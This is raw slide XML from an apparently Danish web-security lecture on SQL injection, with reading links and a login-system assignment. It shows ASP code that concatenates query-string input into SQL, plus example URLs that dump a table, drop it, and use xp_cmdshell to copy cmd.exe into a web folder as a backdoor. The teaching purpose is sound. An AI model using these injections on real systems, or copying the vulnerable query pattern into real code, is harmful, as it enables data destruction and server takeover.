              <a:rPr lang="da-DK" sz="1900" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1900" dirty="0" err="1"/>
              <a:t>www.microsoft.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1900" dirty="0"/>
              <a:t>/en-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1900" dirty="0" err="1"/>
              <a:t>us</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1900" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1900" dirty="0" err="1"/>
              <a:t>news</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1900" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1900" dirty="0" err="1"/>
              <a:t>stories</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1900" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1900" dirty="0" err="1"/>
              <a:t>cybercrime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1900" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1900" dirty="0" err="1"/>
              <a:t>index.html</a:t>
            </a:r>
            <a:endParaRPr lang="da-DK" sz="1900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sz="1900" dirty="0" smtClean="0"/>
              <a:t>Microsoft Disrupts the Emerging </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0" err="1" smtClean="0"/>
              <a:t>Nitol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0" smtClean="0"/>
              <a:t> Botnet Being Spread through an Unsecure Supply Chain</a:t>
            </a:r>
            <a:endParaRPr lang="da-DK" sz="1900" noProof="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="640080" lvl="1" indent="-246888" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0" smtClean="0"/>
              <a:t>	http://blogs.technet.com/b/microsoft_blog/archive/2012/09/13/microsoft-disrupts-the-emerging-nitol-botnet-being-spread-through-an-unsecure-supply-chain.aspx</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1900" noProof="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="639127" lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0" err="1"/>
              <a:t>crackstation.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0"/>
              <a:t>/hashing-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0" err="1"/>
              <a:t>security.htm</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="639127" lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0" smtClean="0"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0" err="1"/>
              <a:t>kestas.kuliukas.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0" err="1" smtClean="0"/>
              <a:t>RainbowTables</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" noProof="0" dirty="0" smtClean="0"/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noProof="0" dirty="0" smtClean="0"/>
              <a:t>Additional reading:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="639127" lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Microsoft Security Intelligence Report </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="666559" lvl="2" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1"/>
              <a:t>www.microsoft.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>/security/sir/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>default.aspx</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="639127" lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>NIST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>Cybersecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> Practice Guide, Special Publication 1800-4: “Mobile Device Security: Cloud &amp; Hybrid Builds”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="666559" lvl="2" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1"/>
              <a:t>nccoe.nist.gov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>/projects/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1"/>
              <a:t>building_blocks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>mobile_device_security</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" noProof="0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da-DK" sz="1900" dirty="0"/>
              <a:t>Site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1900" dirty="0" err="1"/>
              <a:t>wide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1900" dirty="0"/>
              <a:t> XSS – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1900" dirty="0" err="1"/>
              <a:t>fortconsult</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1900" dirty="0"/>
              <a:t> ( on fronter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1900" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1900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sz="1900" dirty="0" err="1" smtClean="0"/>
              <a:t>Owasp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1900" dirty="0" smtClean="0"/>
              <a:t>: SQL Injection Prevention Cheat Sheet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="667512" lvl="2" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0" smtClean="0"/>
              <a:t>http://www.owasp.org/index.php/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0" err="1" smtClean="0"/>
              <a:t>SQL_Injection_Prevention_Cheat_Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" noProof="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noProof="0" dirty="0" smtClean="0"/>
              <a:t>Assignment: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sz="2100" noProof="0" dirty="0" smtClean="0"/>
              <a:t>Create login system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sz="2100" dirty="0" smtClean="0"/>
              <a:t>Remember Mandatory 1</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="21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292054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SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>Injection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All web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>applications</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>based</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> SQL databases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potentially</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> vulnerable. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0" smtClean="0"/>
              <a:t>	(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>DB2, MS SQL, Oracle, Sybase, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t> etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="8"/>
            <a:endParaRPr lang="da-DK" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t>Problems </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>occour</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r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client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> side data is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> in database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>queries</a:t>
            </a:r>
            <a:endParaRPr lang="da-DK" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="8"/>
            <a:endParaRPr lang="da-DK" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>Lack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> of data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>validation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>before</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> it is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>passed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> to a DBMS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="da-DK" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="da-DK" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr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http://www.dubex.dk/download/presentations/pdf/2003/IDAIT-WEBSEC-11NOV2003.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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052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SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>cont</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK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Does</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>compromise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t>May </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>compromise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>entire</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>Possible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>backdoor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> to the system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="8"/>
            <a:endParaRPr lang="da-DK" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>Affects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> kinds all data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>received</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> from a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>client</a:t>
            </a:r>
            <a:endParaRPr lang="da-DK" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t>Input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>field</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>Hidden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>field</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t>HTTP header data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t>Cookie data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="da-DK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02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happen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t>All </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>rows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>table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returned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Example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7858180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err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>showproducttable.asp</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> = "SELECT * FROM products WHERE id=“ &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Request.QueryString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>(“ID”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t>…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3429000"/>
            <a:ext cx="7858180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smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>URL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>showproducttable.asp?ID=4+OR+1=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="da-DK" sz="800" dirty="0" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>SQL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>SELECT * FROM products WHERE id=4 OR 1=1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3079900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happen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>products</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>table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deleted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> from the database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Example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7858180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err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>showproducttable.asp</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> = "SELECT * FROM products WHERE id=“ &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Request.QueryString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>(“ID”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t>…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3429000"/>
            <a:ext cx="7858180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smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>URL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>showproducttable.asp?ID=4%01DROP+TABLE+PRODUCTS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="da-DK" sz="800" dirty="0" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>SQL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>SELECT * FROM products WHERE id=4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DROP TABLE PRODUCTS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02852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>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/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pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="da-DK" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="da-DK" dirty="0" smtClean="0"/>
          </a:p>
          <a:p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happen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>Extended</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> procedure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>executes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK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a-DK" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>copy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> \winnt\system32\cmd.exe \</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>inetpub\scripts</a:t>
            </a:r>
            <a:endParaRPr lang="da-DK" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t>A server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>backdoor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>created</a:t>
            </a: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Example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7858180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err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>showproducttable.asp</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> = "SELECT * FROM products WHERE id=“ &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Request.QueryString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>(“ID”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t>…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3429000"/>
            <a:ext cx="7858180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smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>URL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>showproducttable.asp?ID=4%01EXEC+master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>		‘copy+\winnt\system32\cmd.exe+\inetpub\scripts’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="da-DK" sz="800" dirty="0" smtClean="0">
